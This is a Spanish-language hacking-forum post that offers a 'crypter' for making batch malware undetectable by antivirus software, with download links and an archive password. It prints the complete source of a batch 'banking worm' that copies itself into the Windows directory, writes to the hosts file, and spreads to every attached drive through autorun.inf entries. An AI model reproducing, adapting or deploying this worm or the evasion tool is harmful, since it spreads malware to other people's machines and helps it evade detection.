Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Temas - r@mbyte

#1
hola amigos de elhacker aca les traigo una tool que hize para un foro amigo de hackxcrack es un encriptador que les deja a su malware en batch indetectable a los avs


[youtube=425,350]http://www.youtube.com/watch?v=36wrAlAeZBM[/youtube]


el gusano

antes

@echo off
::         + [ b4nking-worm ] +        
:: www.aztekmindz.org octalh@gmail.com  
::   – Generador Gusano bancario –      
COPY %0 "C:\WINDOWS\r@mbyte.bat"
SET htxt=C:\WINDOWS\system32\drivers\etc\hosts
IF EXIST %htxt% (
echo # [+]====[ b4nking w0rm by octalh ]====[+] >>%htxt%
echo # [+]====[ b4nking w0rm by octalh ]====[+] >>%htxt%
)
IPCONFIG /FLUSHDNS
:INICIO
FOR %%A IN (D F G H I J K L M N O P Q R S T U V W X Y Z) DO CALL :VERFICAR %%A  
GOTO :EOF
:VERFICAR
IF EXIST "%1:" (CALL :COPIADO %1)
GOTO :EOF  
:COPIADO  
COPY r@mbyte.bat "%1:\145782.bat"
echo [autorun] > "%1:\autorun.inf"
echo shell\1=abrir >>":\autorun.inf"
echo shell\1\Command="r@mbyte.bat" >>"%1:\autorun.inf"
echo shell\2=explorar >>"%1:\autorun.inf"
echo shell\2\Command="r@mbyte.bat" >>"%1:\autorun.inf"
echo shellexecute= "\r@mbyte.bat" >>"%1:\autorun.inf"
ping -n 10 localhost
GOTO :INICIO


y el cifrado
http://pastebin.com/KbiMGdPv


thanks
July(por los iconos) ,kr34t0r(por las imagenes) y mrobles(por su manual que me sirvio de inspiracion para hacer la tool)

nuevo link http://www.mediafire.com/download.php?lcebfl7n86t2ce2
Pass:H@ckXcr@ck


dudas y sugerencias bienvenidas
PD:pequeño bug de la ocx arreglada saludos!  :)